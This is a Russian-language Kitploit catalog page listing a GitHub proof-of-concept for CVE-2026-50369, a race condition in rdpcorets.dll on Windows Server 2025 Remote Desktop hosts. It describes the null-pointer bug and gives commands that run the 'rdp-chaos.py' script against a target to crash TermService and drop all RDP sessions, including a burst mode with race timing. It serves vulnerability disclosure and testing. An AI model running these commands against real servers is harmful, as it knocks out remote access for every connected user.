Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-50369 — PoC-репродусер для CVE-2026-50369 — состояния гонки TOCTOU в rdpcorets.dll на RDS Session Hosts под управлением Windows Server 2025, вызывающей DoS TermService через разрыв RDP-сессии. | Kitploit
Инструменты/GitHubGitHub/mofarthim/cve-2026-50369
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed Teaming
GitHubmofarthim/cve-2026-50369

CVE-2026-50369

PoC-репродусер для CVE-2026-50369 — состояния гонки TOCTOU в rdpcorets.dll на RDS Session Hosts под управлением Windows Server 2025, вызывающей DoS TermService через разрыв RDP-сессии.

Репозиторий
22 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-50369

воспроизведение состояния гонки TOCTOU в rdpcorets.dll!CRdpPipeGfxPlugin::Enable на узлах сеансов RDS Windows Server 2025.

я сообщил об этом как о DoS; этот путь выполнения, по-видимому, также каким-то образом позволяет EoP. данный воспроизводитель является PoC только для пути DoS.

Ошибка

Enable дважды читает указатель COM-интерфейса по адресу this+0x60 без синхронизации. TerminateInstance очищает то же поле вне области своей критической секции. Оба выполняются одновременно в пуле потоков NT через рабочие элементы прибытия и удаления PnP-устройства. Второе чтение разыменовывает null → нарушение доступа → сбой TermService → все активные сеансы RDP отключаются.

root@kitploit:~
# install dependencies (Debian/Ubuntu)
sudo apt install -y freerdp3-x11 xvfb python3  # or freerdp2-x11

# create credentials file
echo -e "user1:pass1\nuser2:pass2\nuser3:pass3" > credentials.txt

# standard mode
python3 rdp-chaos.py --server <target> --creds credentials.txt

# burst mode (faster trigger)
python3 rdp-chaos.py --server <target> --creds credentials.txt \
    --burst --burst-count 16 --burst-kill-hold 0.1 --burst-race 0.030
Скачать инструмент